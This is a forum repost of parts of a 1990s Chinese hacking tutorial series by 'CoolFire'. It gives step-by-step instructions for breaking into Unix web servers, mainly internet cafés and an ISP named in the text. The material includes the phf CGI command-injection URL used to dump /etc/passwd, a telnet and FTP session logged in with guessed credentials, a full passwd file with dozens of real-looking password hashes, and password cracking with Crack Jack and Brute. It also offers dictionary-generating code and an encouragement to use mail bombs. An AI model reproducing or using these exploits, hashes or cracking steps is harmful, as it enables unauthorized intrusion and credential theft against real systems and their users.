href="http://www.fuckyou.hinet.net" target="_blank">www.fuckyou.hinet.net</a></a> Connected to cool.fuckyou.hinet.net. 220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready. Name (<a href="http://www.fuckyou.hinet.net:66126):" target="_blank"><a href="http://www.fuckyou.hinet.net:66126):" target="_blank">www.fuckyou.hinet.net:66126):</a></a> fuckyou 331 Password required for fuckyou. Password: 230 User fuckyou logged in. Remote system type is UNIX. Using binary mode to transfer files. ftp> cd /etc 250 CWD command successful. ftp> get passwd 200 PORT command successful. 150 Opening BINARY mode data connection for passwd (350 bytes). 226 Transfer complete. 350 bytes received in 0.68 seconds (1.9 Kbytes/s) ftp> !cat passwd root:acqQkJ2LoYp:0:0:root:/root:/bin/bash john:234ab56:9999:13:John Smith:/home/john:/bin/john (看看 ! 呵 ! 假不了 !!......) ftp> bye 221 Goodbye. ms.hinet.net> exit (闪人罗 !! 下课 !!.... 喔慢点, 还有事要说明......) passwd 的 Shadow 就是把 passwd 放在 shadow 档中, 而你原先在第一节课所看到的这个格式的 passwd 并不是真正的 passwd.... root::0:0:root:/root:/bin/bash 因为密码的部份没有东西.... 所以拿了也没有用 !! 但这一节课所拿到的东西呢,像是这样, 有几点需要说明的, 就是它究竟代表著甚麽??? john:234ab56:9999:13:John Smith:/home/john:/bin/sh 它以 ":" 分成几个栏位, 各栏位对照如下: User Name: john Password:234ab56 User No: 9999 Group No: 13 Real Name: John Smith Home Dir: /home/john Shell: /bin/sh 了了吧 ! 了了吧 ! 保留著你千辛万苦所拿到的 passwd, 咱们第三节课再来告诉各位如何使用 Crack Jack 把 passwd 解码.... 呵呵... zzZZzZzz... -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- Crack Jack V1.4 中文使用说明 (By CoolFire 12-1-1996) 嗯... 该到第三课了 !! 累了的同学先去喝口水吧! 这一节课咱们来说说 Crack Jack ! 这可是个解读 /etc/passwd 的好工具喔,不要告诉我你习惯用Brute, 拿 Brute 跟 Crack Jack 的速度比比看, 包准你马上投向 Crack Jack 1.4的怀抱, 但请先确定你所使用的是 Crack Jack 1.4, 你可以在 CoolFire 的 Hacker&Mailer Page 中拿到这个版本的 Crack Jack ! 这才是真正有用的版本, 速度... 对... 就是这点别人都比不上 !但还是要讲讲它的缺点... 就是只能在 DOS 跟 OS2 中跑, 如果在 Windoz 95 上开个 DOS Mode 跑,它可是连理都不会理你的 ! OK! 现在切入正题 ! etc/passwd 拿到手了吧 !! 开始罗 !! 使用 Crack Jack 1.4前所需要的东西有这些 [1] Crack Jack 1.4 (废话...$%^&@@) [2] /etc/passwd 档案, 你可以在 Unix 系统中的 /etc/ 目录中找到 passwd [3] 字典档 (哪里找, 自己敲... 呵 ClayMore 中有一份 DIC.TXT是有一千多个字的字典, 但比起我的字典可就小巫见大巫了, LetMeIn! 1.0 里面也有, 听James说 2.0 Release 的时候会有更棒的字典档含入, 期待吧!).... 使用 Crack Jack 1.4 前需先确定你所使用的机器是 386 含以上 CPU 的 ! 然後最好有充足的记忆体 !! 开始 Jack 时只要敲入 JACK 即可, 它会问你 PW Name... 输入你的 passwd 档名,Dictionary Name 输入你的字典档名, Jack 就会开始找了 ! 找到时会告诉你, 也会在 JACK.POT中写入它所找到的密码 !! 但... 有点怪的格式! 如果找到的是具 root 权限的密码, Jack 会告诉你 This is JackAss... 嗯...说脏话了 !! 因为使用 Jack 占用的时间实在太多,如果你中途想要停掉时只要按下 Ctrl-C 即可, 别以为你前功尽弃了! 因为 Jack 有个 Restore 的功能,中断时会自动存档为 RESTORE, 下次要继续这次的寻找只要输入 Jack -Restore:RESTORE 即可 !! 当然你也可以为你的 Restore 重新命名 ! Jack 也会找得到的 ... 如Renrestorerestore.HNT 之後要再寻找的时後就 Jack -Restore:RESTORE.HNT 即可... Jack 会很自动的 Restore 前次所寻找的字串...继续帮你找下去.... 字典档哪里找: 我的不给你! 可以找别的 Brute Force 之类的程式, 有些里面会附,或是找找其它的 Hacker 地下站看看有没有, 自己编一个, 或找个英汉字典软体将字典的部份解出来, 可能要有一点资料栏位及写程式的基础. [这一节课没有范例] 成功的案例: 找到过某家网路咖啡店的 root 权限密码 ! Jack好正点呀 !!!所花的时间: 20 分钟左右... 但也有找了一两天也找不到的..... 呜... 骇客们! 加油吧!! ------ 最近比较没空了 ! 因为要赶其它的报告, Home Page 也没有太多时间整理,更别说是写这些说明了,但是太多网友需要, 我只好两肋插刀... 差点昨天就交不出报告了 !!如果你有兴趣写其它程式的中文说明, 请完成後寄一份给我, 我将它放在 Home Page 上面让其它人参考,当然你也可以给我你的使用心得, 让别人参考看看也行! 另外 CoolFire 目前准备收集一系列的System Hole List, 如果你在其它的站台有看到的, 请把它先 Cut 下来, Mail 一份给我 !这样我才能弄出一份更齐全的东西呀.... 还有... 在想弄个 Mail List... 唉.. 不想这麽多了! 有空再说吧! 再次重申, Crack 别人站台之後不要破坏别人站台中的资料, 此篇文章仅作为教育目的,不主张你随便入侵他人主机.... (当然高-Net 除外, 我恨死它了)... 请勿将这类技术使用於破坏上 (又.....如果第三次世界大战开打, 你可以任意破坏敌国的电脑网路... 我全力支持),最严重的情况(如果你真的很讨厌该主机的话)... 就将它 Shut Down.... 好了! 别太暴力了!

白鹤 · 发表于 2005-7-22 22:02:43

如何破解系统(2) 这不是一个教学文件, 只是告诉你该如何破解系统,好让你能够将自己的系统作安全的保护, 如果你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的电脑, 我是 CoolFire, 写这篇文章的目的是要让大家明白电脑安全的重要性, 并不是教人 Crack Password若有人因此文件导致恶意入侵别人的电脑或网路, 本人概不负责 !! 话说上次 CoolFire 讲到许多的 Net Coffee 店, 安全性之差实在是没话说,但是过了这麽久也不见有几家改进, 可能是想让自己的电脑被别人玩弄在股掌之间吧, 但可不是每个人都像CoolFire这样温和, 如果遇到的是比较狠一点的角色, 那你的 Net Coffee 可能要有一两天只卖Coffee 而没办法再 Net 下去了!! 继 CoolHC#1 推出後, 有许多人是否已经跃跃愈试了呢 ?? 这次咱们不谈新的花招,用用之前所讲的再来探险一番, 当然, 这一次我照往例还是不会使用真正的 Domain Name 来作教学,但是课程中的所有内容绝对属实, 当然本次攻击的对象还是.... Net Coffee Shop.... **谈一下 Crack Jack 猜猜密码 许多人从上一次介绍 Crack Jack 之後就应该已经领教过它的功力了,但是有几点需要说明的, 有些人使用 Jack 来帮你寻找 password, 我就当你已经抓到了没有 shadow 的 /etc/passwd, 但是为甚麽使用 Jack 还是找不到呢?? 我想你应该要换个正点一点的字典档了, 因为Jack 还 是根据你所提供的字典档在寻找, 如果你提供的字典本身就没有这些字,那当然连一个小小帐号 的密码你都别想猜到了. 数一下你所使用的字典档中有多少字 ???我用的字典档有十九万多个 字, 你的呢? 是不是小巫见大巫呀 ?? 那麽就赶快充实一下字典档再重新寻找吧 !! 许多人的密码都有一定的法则, 我自己写了 PaSs2DiC 就是将 UserName 由passwd档转成字典档的工具, 这是对一些喜欢使用 UserName 当作 Password 的人最好的方式,但是也曾经好运的找到别人的密码, 真不晓得"甲"是不是暗恋"乙"才用"乙"的 ID 作为密码的 ???你可以很简单的使用Qbasic 来制作 "序数" 密码, 或日期密码, 底下简单的作一个 0101 (一月一日) 到 1231 的密码 档出来: ------------Cut Here MakeDate.BAS ------------------- Open "Dates" for output as #1 for I=1 to 12 for J=1 to 31 I1$=rtrim$(ltrim$str$(I))) J1$=rtrim$(ltrim$str$(J))) if len(I1$)=1 then I1$="0"+I1$ if len(J1$)=1 then J1$="0"+J1$ Out$=I1$+J1$ print #1,Out$ next I next J close ------------ Cut Here End MakeDate.BAS ---------------- 这支小程式将会写一个 "DATES" 的档案, 里面就是你要的字典, 当然啦,这只是包含月跟日 !! 如果你要猜的密码是含年份的, 你可能要再增加一些程式码, 再 Run 一次试试看了,不过这是一个好的开始不是吗 ?? **如何保护自己的密码 谈了这麽多的密码猜法, 当然要谈一下如何保护自己的密码不被破解, 请遵守以下的原则: [1]不用生日作为密码(太容易猜了啦) [2]不用序数作为密码(除非你的序数无限大) [3]不用身份证字号作为密码(LetMeIn! 里有猜身份证字号的功能耶) [4]不用在字典中查得到的字作为密码. 那麽依照上面的几点说法, 甚麽样子的密码最不容易猜, 自己也最好记呢?? 答案是:用一句有意义的话来作为自己的密码, 例如: NoOneCanCrackIt 就是一个很难猜的密码类型,基於这个密码猜法的原则, 你的密码是不是要作些更新, 或是大小写要作一些对调 ?? 如果你的密码是 coolfire, 建议你最好能改成 CoolFire 或 coolfires (加复数 "s"), 这样被猜中的机率就小了很多. 如果你是一个 Hacker, 你的密码也被人猜中的话... 那...#%%^^^&@ **正式的话题 这次的话题当然还是 Crack, 相信许多人已经看过 CoolHC#1 了,当然眼尖的人可能也已经 D/L System Holes 试过了, 你有成功的例子吗 ?? 如果没有, 这份 CoolHC#2可能就是你的强心针, 因为这次谈的正是 System Holes #1 成功的案例.Step 1. 连线到 "蕃薯藤" 找 "网路咖啡" 找到好多家网路咖啡的 WWW 网址,一一连上去试试看 在 System Holes #1 中的方法可不可行. Step 2. 若可行则会传回 /etc/passwd 资讯, 存档後迅速 Logout, 使用 Crack Jack 解读!! [[实例探讨]] System Holes #1 中所介绍的 WWW 入侵法是这样子的: <a href="http://www.somewhere.com/cgi-bin/nph-test-cgi" target="_blank">http://www.somewhere.com/cgi-bin/nph-test-cgi</a>?* 後再 <a href="http://www.somewhere.com/cgi-bin/phf?Qalias=x%0aless%/20/etc/passwd" target="_blank">http://www.somewhere.com/cgi-bin/phf?Qa...%/20/etc/passwd</a> [1] 用 WWW Browser 连到 yournet.net [2] Location 输入 --> "<a href="http://www.yournet.net/cgi-bin/nph-test-cgi" target="_blank"><a href="http://www.yournet.net/cgi-bin/nph-test-cgi" target="_blank">www.yournet.net/cgi-bin/nph-test-cgi</a></a>?*" [3] 接著如果出来一份像 Report 的画面的话, 接著输入 /cgi-bin/phf?Qalias=x%0aless%20/etc/passwd [4] 发生了甚麽事?? etc/passwd 在你的浏览器中 "显示" 出来了 !! 快点 Save 吧 !! 这个方法所用的是系统 "检索" 的漏洞, 不提供这个功能,或是伺服器检索类型不同的机器则不 会接受这样的指令, 当然也就逃过我们这次的模拟演练啦 !! 但是.... 相信我,你一定会找到一家脱线的网路咖啡, 并没有像我们一样每天阅读 Mail List 的信,对系统安全一点研究也没有的人不在少数. <a href="http://hacker.welcome.com" target="_blank">http://hacker.welcome.com</a> 就是这样的一个 Net Coffee Shop...呵.... 快来试试吧 !! 当 CoolFire 抓到 /etc/passwd 後, 立刻存档, 也马上断线, 并且拿出 UltraEdit来瞧一下使用者的资讯, 当然这个小 passwd 对 Crack Jack 来说, 实在是不够看,没几分钟就在我的 486 机器上显示出来几个以 UserName 作为 Password 的资讯 (归功於 PaSs2DiC 及CrackJack 的功劳)不过当我试著找寻 root 的密码时, 一想到我那将近 20 万字的字典档,就想到可能花费的时间一定相当的惊人, 於是就以 Jack 的 Option 设定只寻找 root 那一行, ...(过了良久)... 果不然又是一个笨 root. 用了 "非常" 容易猜的密码... <--- This is JackAss... 呵!! Got It! 如果你所使用的机器速度不是顶快, 你最好能够到快一点的机器上使用 Crack Jack,不然你也可以将字典档切割成几个小档案, 然後再分别在几台机器上跑, 我目前使用的配备是486DX4-13032MB RAM, 3.2GB HDD, 近 20 万字的字典档, 如果在分析较大的 passwd档时我会将字典档切割为四至五个小档 (看有多少台机器可跑),然後在周末下班前在公司的几台机器上分别执行 Crack Jack, 等到礼拜一上班时就等著接收成果了! 当然如果你只有一台机器, passwd档又很大的话,由於 Crack Jack 无法於 Windoz 95 下使用, 你可能只能牺升时间或机器来跑了!再没有办法的话, 亦可使用单机多工, 多开几个 DOS Box 来跑 Brute, 也许也是一个可行的办法! **後语 有许多人在使用 Crack Jack 的时候有许多问题, 不过看了 CoolHC#1 应该都解决了吧?? 最近大家问的比较多的是 UpYours 3.0, 虽然已经改进了 Install 的问题,不过大家的问题还是都出在Winsck.ocx 上面, 有人说装了 MSICP Beta 会好 ?? 但也有实例装了也还不能 Run 的, 在此建议大家不要再玩 MailBomb 了, 虽然我喜欢收集这种东西, 但还是少乱炸为妙,已经证实有许多常用的 MailBomb 没有办法 Fake IP 了 !! 所以... 如果 UpYours 3.0装不起来的人就试试 KaBoom!V3.0 吧 ! 虽然没有办法 Fake IP (选错 Mail Server 的话), 但是也是一个不错的AnonyMailer如果要发匿名信, 现在首页上有可以帮你发信的 Mailer, 会安全一点. 如果你仍旧对 UpYours 3.0 不死心, 就试试 ResSvr32.exe (Under Windows/systemrectory), 看看能不能将 WinSck.ocx 装上了... 记得先 UnReg 再 Reg... 在此建议大家可以多订阅一些 "系统安全" 讨论的 Mail List或多参考一些已经被找出来的系统漏洞, 因为有些人对这些方面并不是很重视, 所以这些资讯也就显得格外的重要了,如果能够多参考一些资讯, 在你入侵的时候会有很大的帮助, 当然, 如果你能作出一份列表出来,放在手边参考的话, 就可以快速的; 安全的入侵了!! 下一次所谈的是 SendMail 的 Bug 实例,在这中间当然照往例会先出一份 System Holes #2 来作为资料. 如果有兴趣的人在 SH#2出来的时候可以先研究看看. 下次见! Merry X'Mas..... & Happy New Year....... ------ 上次讲的 Home Page 建置案还没搞完, 没有充实一下 Home Page 实在是对不起大家,所以利用一点时间写了 CoolHC#2, 可能报告又交不出来了 !! 老话,如果你有兴趣写其它程式的中文说明, 请完成後寄一份给我, 我将它放在 Home Page 上面让其它人参考,当然你也可以给我你的使用心得, 让别人参考看看也行! 目前准备收集一系列的 System Hole List,如果你在其它的站台有看到的, 请把它先 Cut 下来, Mail 一份给我 ! ------ 再次重申, Crack 别人站台之後不要破坏别人站台中的资料, 此篇文章仅作为教育目的,不主张你随便入侵他人主机.... (高-Net 还是除外)... 请勿将这类技术使用於破坏上 (又...如果第三次世界大战开打, 你可以任意破坏敌国的电脑网路... 我全力支持),最严重的情况(如果你真的很讨厌该主机的话)... 就将它 Shut Down.... 好了! 别太暴力了!

白鹤 · 发表于 2005-7-22 22:04:56

如何破解系统（3） 这不是一个教学文件, 只是告诉你该如何破解系统,好让你能够将自己的系统作安全的保护, 如果你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的电脑, 我是 CoolFire, 写这篇文章的目的是要让大家明白电脑安全的重要性, 并不是教人 Crack Password若有人因此文件导致恶意入侵别人的电脑或网路, 本人概不负责 !! 前几次说到了 Net Coffee 店, 还好他们没有提供客户拨接上线的功能,不然密码或是帐号被人盗用的客户不就糗大了! 但是 CoolFire 在这两周的探险中, 为了找一个酷似网路咖啡站台的 W3 密码,误入一个号称第一个提供网路拨接的 ISP, 且在 CoolFire 顺利的抓回 /etc/passwd 之後, 使用了自己写的 PaSs2DiC + CJack 来解出密码, 没想到不用 1 分钟, 就找出了 9 组 ID 与Password 相同的密码,勿怪我没有在这里提醒大家, 还好我没有找到 root password, 不然可能该系统就此停摆,不可再见天日也! (当然我不可能这麽作啦!). 看看最近兴起的网路咖啡及各大网站的系统安全设施, 再加上 CoolFire最近开会的时候遇到的情况, 不难发现我们的国家正往高科技的领域快步迈进, 但是这些系统的安全性若不加强,可能到时候人家只要一台电脑再加上一台数据机就可以让整个国家的金融及工商业崩溃! 大家要小心呀 ! ISP 是一般 User 拨接的源头, 技术上理应比较强, 但还是轻易让人入侵, 且又没有教导User 正确的网路使用观念 (Password 的设定及 proxy 的使用等),实在不敢想像这样的网路发展到几年後会是甚麽样子 ?? 这一次的说明还是没有谈到新的技巧, 在 James将首页更新後各位应该已经可以从中学到许多东西了, 如果想要学习入侵, 就一定要知道最新的资讯 (入侵本国的网路则不用,反正没人重视网路安全..... 真失望), 在别人还没将 Bug 修正之前就抢先一步拿到 /etc/passwd,所以订阅一些网路安全的 Mail List 是必要的, 多看一些网安有关的 News Group 也是必要的 (不仅 Hacker如此, ISP 更要多注意这些资讯!). 日後有空再整里一些 Mail List 给大家 !! 本次主题: 说明如何连接该 ISP 并且对其 /etc/passwd 解码连接位址: <a href="http://www.coffee.com.tw" target="_blank"><a href="http://www.coffee.com.tw" target="_blank">www.coffee.com.tw</a></a> (203.66.169.11)特别说明: 由於本次主题说明重点使用真实的位址及名称, 所以 CoolFire 已经 Mail给该网页之维护人员更改密码, 但该网页之 ISP 仍为新手之练习好题材! CoolFire Mail 给该网页维护人员之信件内容如下, 如果他还不尽快改掉, 我也没办法了! Mail sent to dhacme@tp.globalnet.com.tw: Subject: 请速更动网页密码 From: CoolFire <coolfires@hotmail.com> 你的网页作得不错, 但是因为你所设定的密码太容易为骇客所? 入侵, 请於见到此信後速速更改你的网页进入密码, 否则下次若网页遭到篡改, 本人概不负责!! **** 课程开始 **** 请注意: 由於本次所作的课程内容以实作为主, 除了本人 IP 有所更改,一切都使用本人所用之 Telnet 软体 Log 档收录, 故若道德感不佳者请勿阅读以下之详细破解内容,否则本人概不负责! (连线到某一主机之後.... 此处的 ms.hinet.net.tw 是假的 Domain name) ms.hinet.net.tw> telnet <a href="http://www.coffee.com.tw" target="_blank"><a href="http://www.coffee.com.tw" target="_blank">www.coffee.com.tw</a></a> Trying 203.66.169.11... Connected to <a href="http://www.coffee.com.tw" target="_blank"><a href="http://www.coffee.com.tw" target="_blank">www.coffee.com.tw</a></a>. Escape character is '^]'. Password: (随便按一下 Enter) Login incorrect www login: coffee (以 Hacker 的敏锐判断 username=coffee password=coffee) Password: Last login: Thu Jan 9 10:41:52 from ms.hinet.net.tw 欢迎光临 ....... 以下略! 因涉及该 ISP 的名誉, 大家自己去看吧! ================================================================= (直接进入核心部份) www:~$ cd /etc www:/etc$ ls DIR_COLORS hosts.equiv printcap HOSTNAME hosts.lpd profile NETWORKING inet@ protocols NNTP_INEWS_DOMAIN inetd.conf psdevtab X11@ inittab rc.d/ at.deny inittab.gettyps.sample resolv.conf bootptab ioctl.save rpc csh.cshrc issue securetty csh.login issue.net securetty.old default/ klogd.pid sendmail.cf diphosts ld.so.cache sendmail.st exports ld.so.conf services fastboot lilo/ shells fdprm lilo.conf shutdownpid fs/ localtime skel/ fstab magic slip.hosts ftp.banner mail.rc slip.login ftp.deny motd snooptab ftpaccess motd.bak sudoers ftpconversions msgs/ syslog.conf ftpgroups mtab syslog.pid ftpusers mtools termcap gateways named.boot ttys gettydefs networks utmp@ group nntpserver vga/ host.conf passwd wtmp@ hosts passwd.OLD yp.conf.example hosts.allow passwd.old hosts.deny ppp/ (看看我们的目标长得如何???) www:/etc$ cat passwd root:abcdefghijklmn:0:0:root:/root:/bin/bash bin:*:1:1:bin:/bin: daemon:*:2:2:daemon:/sbin: adm:*:3:4:adm:/var/adm: lp:*:4:7:lp:/var/spool/lpd: sync:*:5:0:sync:/sbin:/bin/sync shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown halt:*:7:0:halt:/sbin:/sbin/halt mail:*:8:12:mail:/var/spool/mail: news:*:9:13:news:/usr/lib/news: uucp:*:10:14:uucp:/var/spool/uucppublic: operator:*:11:0:operator:/root:/bin/bash games:*:12:100:games:/usr/games: man:*:13:15:man:/usr/man: postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash nobody:*:-1:100:nobody:/dev/null: ftp:*:404:1::/home/ftp:/bin/bash guest:*:405:100:guest:/dev/null:/dev/null shan:Ca3LGA8gqDV4A:501:20:Shan Huang:/home/staff/shan:/bin/bash www:/U5N5/l0B.jWo:502:20:WWW Manager:/home/staff/www:/bin/bash test:aFoIbr40sdbiSw:503:100:test:/home/test:/bin/bash fax:aHhi5ZoJwWOGtc:504:100:FAX_SERVICE:/home/staff/fax:/bin/bash women:IiO94G5YrrFfU:505:100:Perfect Women:/home/w3/women:/bin/bash kanglin:aMjy/8maF4ZPHA:506:100:Kanglin:/home/w3/kanglin:/bin/bash coffee:AlwDa18Au9IPg:507:100:Coffee:/home/w3/coffee:/bin/bash bakery:aFm7GUGCuyfP2w:508:100:Bakery:/home/w3/bakery:/bin/bash carven:aPaqr3QAdw8zbk:509:100:Carven:/home/w3/carven:/bin/bash haurey:/2m87VjXC742s:510:100:Haurey:/home/w3/haurey:/bin/bash prime:nPOlsQhQFJ.aM:511:100:Prime:/home/w3/prime:/bin/bash tham:H2AOlPozwIIuo:512:100:xxxxxxxxxx:/home/w3/tham:/bin/bash ccc:aFiKAE2saiJCMo:513:100:ccc:/home/w3/ccc:/bin/bash sk:UPrcTmnVSkd3w:514:100:sk:/home/sk:/bin/bash services:9yBqHWfnnNr.k:515:100:xxxx:/home/w3/haurey/services:/bin/bash order:LpnMHVjy9M/YU:516:100:xxxx:/home/w3/haurey/order:/bin/bash corey:mhRsFO60hFsMU:517:100:xxxx:/home/w3/haurey/corey:/bin/bash richard:EmUWnU6Bj7hQI:519:100:richard:/home/w3/richard:/bin/bash lilian:Opx5xwctJTO1A:520:100:lilian:/home/w3/lilian:/bin/bash support:JdOqvTZqdZ9wQ:521:100:support:/home/w3/support:/bin/bash hotline:BiSzCJsDhVl7c:522:100:hotline:/home/w3/hotline:/bin/bash stonny:/UNPsb9La4nwI:523:20::/home/staff/stonny:/bin/csh bear:w/eF/cZ32oMho:524:100:bear:/home/w3/bear:/bin/bash lance:Pf7USG6iwgBEI:525:20:Chien-chia Lan:/home/staff/lance:/bin/tcsh taiwankk:ijPWXFmRF79RY:526:100:hotline:/home/w3/taiwankk:/bin/bash service:ulfWaOzIHC.M.:527:100:prime service:/home/w3/service:/bin/bash liheng:6hGixt6Kgezmo:528:100:prime liheng:/home/w3/liheng:/bin/bash caves:RyvviMcWTTRnc:529:100:gallery:/home/w3/caves:/bin/bash sales:CmtV4FZsBIPvQ:518:100:prime:/home/w3/prime/sales:/bin/bash kingtel:8E7f0PIQWfCmQ:530:100:kingtel:/home/w3/kingtel:/bin/bash recycle1:JgbZHVRE4Jf3U:531:100:recycle1:/home/w3/recycle1:/bin/bash recycle2:Qg85xgdnsqJYM:532:100:recycle2:/home/w3/recycle2:/bin/bash recycle3:XhyoUBFQspiS2:533:100:recycle3:/home/w3/recycle3:/bin/bash recycle:109mNZYIZtNEM:534:100:recycle:/home/w3/recycle:/bin/bash hxnet:KhB./jHw.XNUI:536:100:hxnet:/home/w3/hxnet:/bin/bash goodbook:MlD0tx.urQMYc:535:100:goodbook:/home/w3/goodbook:/bin/bash sales1:JmKzPOBMIIYUI:537:100:sales1:/home/w3/prime/sales1:/bin/bash rwu:Pai8mYCRQwvcs:539:100:rwu:/home/w3/kingtel/rwu:/bin/bash charliex:Of6HaxdxkDBDw:540:100:charliex:/home/w3/kingtel/charliex:/bin/bash jdlee:Mhq3gZNup9E3Q:538:100:jdlee:/home/w3/kingtel/jdlee:/bin/bash tkchen:GkTU8ecYIXEyw:541:100:tkchen:/home/w3/kingtel/tkchen:/bin/bash slb:Olf22.gHBZ.QQ:542:100:slb:/home/w3/kingtel/slb:/bin/bash s6t4:GnHFCPdZX7nkU:543:100:s6t4:/home/w3/kingtel/s6t4:/bin/bash lsh:GftygyOntHY6Y:545:100:lsh:/home/w3/kingtel/lsh:/bin/bash lilly:DhKHmlKPE6tRk:544:100:lilly:/home/w3/kingtel/lilly:/bin/bash nalcom:MhHdQ1mvge9WQ:546:100:nalcom:/home/w3/prime/nalcom:/bin/bash jordon:mPgNPVEkIEORM:547:100:jordon:/home/w3/jordon:/bin/bash toonfish:wTscIuas4EeTE:548:100:toonfish:/home/w3/toonfish:/bin/bash yahoo:If.UlNFTal.bk:549:100:yahoo:/home/w3/yahoo:/bin/bash basic:IgLUu9J03lbyU:550:100:basic:/home/w3/basic:/bin/bash wunan:QUHEiPefAaKsU:551:100:xxxxxxxx:/home/w3/wunan:/bin/bash kaoune:eVwM44uTLOpnY:552:100:kaoune:/home/w3/wunan/kaoune:/bin/bash shuchuan:KgPlk7TT6pmBk:553:100:shuchuan:/home/w3/wunan/shuchuan:/bin/bash fan:Jk6E9PqP7xemg:554:100:fan:/home/w3/toonfish/fan:/bin/bash (CoolFire 注: 因为使用 PaSs2DiC 很容易找出 ID 与 Password 相同的. 故除了 Coffee外, 其它我找到密码的 EnCode Password 部份皆改过..... 除非你一个一个试啦~~~ 我没说喔!) www:/etc$ exit logout Connection closed by foreign host. (可以走了 !! 改用 FTP 将 /etc/passwd 给抓回来吧!) ms.hinet.net.tw> ftp <a href="http://www.coffee.com.tw" target="_blank"><a href="http://www.coffee.com.tw" target="_blank">www.coffee.com.tw</a></a> Connected to <a href="http://www.coffee.com.tw" target="_blank"><a href="http://www.coffee.com.tw" target="_blank">www.coffee.com.tw</a></a>. 220- 220- 欢迎光临 ....... 以下略! 因涉及该 ISP 的名誉, 大家自己去看吧! 220- 220- 220- There are 0 users in FTP Server now. 220- 目前已有 0 使用者在此 Server 上. 220- If you have any suggestion, please mail to: 220- service@xx.xxxxxxx.xxx.xx. 220- 220- 220- 220 www FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready. (还是使用刚刚的帐号进入) Name (<a href="http://www.coffee.com.tw:YourName):" target="_blank"><a href="http://www.coffee.com.tw:YourName):" target="_blank">www.coffee.com.tw:YourName):</a></a> coffee 331 Password required for coffee. Password: 230 User coffee logged in. Remote system type is UNIX. Using binary mode to transfer files. (直接到达档案放置地点) ftp> cd /etc 250 CWD command successful. ftp> ls 200 PORT command successful. 150 Opening ASCII mode data connection for file list. ttys fdprm group issue motd mtools profile securetty shells termcap skel csh.cshrc

白鹤 · 发表于 2005-7-22 22:05:29

csh.login
 lilo
 inet
 default
 services
 HOSTNAME
 DIR_COLORS
 passwd
 passwd.OLD
 wtmp
 utmp
 gettydefs
 inittab.gettyps.sample
 ld.so.conf
 ld.so.cache
 at.deny
 fs
 magic
 rc.d
 syslog.conf
 printcap
 inittab
 sudoers
 vga
 diphosts
 mail.rc
 ppp
 NNTP_INEWS_DOMAIN
 sendmail.st
 NETWORKING
 gateways
 bootptab
 exports
 ftpusers
 host.conf
 hosts
 hosts.allow
 hosts.deny
 hosts.equiv
 inetd.conf
 named.boot
 networks
 nntpserver
 protocols
 resolv.conf
 rpc
 ftpaccess
 hosts.lpd
 ftpconversions
 snooptab
 msgs
 ftpgroups
 slip.login
 slip.hosts
 yp.conf.example
 X11
 lilo.conf
 sendmail.cf
 fstab
 fastboot
 mtab
 syslog.pid
 klogd.pid
 shutdownpid
 localtime
 passwd.old
 ioctl.save
 psdevtab
 ftp.banner
 ftp.deny
 issue.net
 motd.bak
 securetty.old
 226 Transfer complete.
 
 (取回该档案)
 
 ftp> get passwd
 200 PORT command successful.
 150 Opening BINARY mode data connection for passwd (4081 bytes).
 226 Transfer complete.
 4081 bytes received in 2.5 seconds (1.6 Kbytes/s)
 
 (尽速离开)
 
 ftp> bye
 221 Goodbye.
 
 好了! 有了 /etc/passwd 之後一切都好办了, 赶紧将你的宝贝收藏 PaSs2DiC 拿出来吧
 !!快点跑一下, 让它自动产生字典档案:
 
 C:\hack>pass2dic
 PaSs2DiC V0.2 (C)1996 By FETAG Software Development Co. R.O.C. TAIWAN.
 
 This tool will:
 
 [1] Load PASSWD file and convert it to only username text file
 [2] Write the file to a dictionary file you choise for target
 
 Your Source PASSWD File Name: passwd
 Your Target Dictionary Name: dic.cfe
 
 PaSs2DiC Author: James Lin E-Mail: fetag@stsvr.showtower.com.tw
 FETAG Software Development Co: <a href="http://www.showtower.com.tw/~fetag" target="_blank">http://www.showtower.com.tw/~fetag</a>
 
 C:\hack>
 
 (这样就好了 ! 自动产生的档案会放在 dic.cfe 这个档案中, 咱们跑一下 Brute Force看看!)
 
 
 C:\hack>fbrute passwd @dic.cfe
 
 BRUTE!, Unix Brute Force Hacking Routine. v2.0
 Copyright (C) 1990, Prometheus. DOS-fastcrypt made available by sir hackalot.
 阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐阐\r 
 　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　
 Attempts/Hits: 5184/9
 　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　
 
 Taking list input from dic.cfe
 Beginning search of passwd for password: xxx
 
 Match for password xxxxxx found! Username: xxxxxx
 Match for password xxxxx found! Username: xxxxx
 Match for password xxx found! Username: xxx
 Match for password xxxxxx found! Username: xxxxxx
 Match for password xxxxxx found! Username: xxxxxx
 Match for password coffee found! Username: coffee
 Match for password xxxxxxx found! Username: xxxxxxx
 Match for password xxx found! Username: xxx
 Match for password xxxx found! Username: xxxx
 
 Done.
 
 C:\hack>
 
 看! 除了 coffee 外还是有许多人使用与 ID 相同的字作为密码, 实在是....@#$%^...&*因某些关系所以其它部份要被 "马赛克" 起来, 请各位读者见量!
 
 **** 再谈密码 ****
 
 看了以上的破解示范, 就可以了解到许多人还是对於 "密码" 这东西不是很有 "密码"的观念, 人就是那麽的懒, 随便设定一个好记的, 但是这种密码确是最不安全的, 上次我们谈到如何用\r QBasic 来设计一个自动产生密码的小程式, 相信对许多人有很大的帮助,底下我们再来浅显的介绍一下字母密码的产生方法, 相信对於你在 Hack 某站会有更大的帮助.
 
 事情的开始是有一位网友 mail 给我, 问我字典档要如何写程式来 "自动扩大",而让我有了写这一段的想法, 现在我就针对这位网友的问题作一个更详细的说明 (因已简短回信答覆),并且写出来让大家了解一下, 当然我们的示范还是使用 QBasic, 因为这是最容易找到的程式了,而且语法大家也可能会比较熟悉一点, 如果我使用 VB 或 C 来写, 可能有些人只会拿去用,而不会去修改或者写个好一点的出来!
 
 先说明一下原理好了: 我们所要作的程式是一个自动产生字典档的程式,所以我们要了解字的字母排列到底有哪些方法可循?? 我们先举几个简单的单字出来比较看看:
 
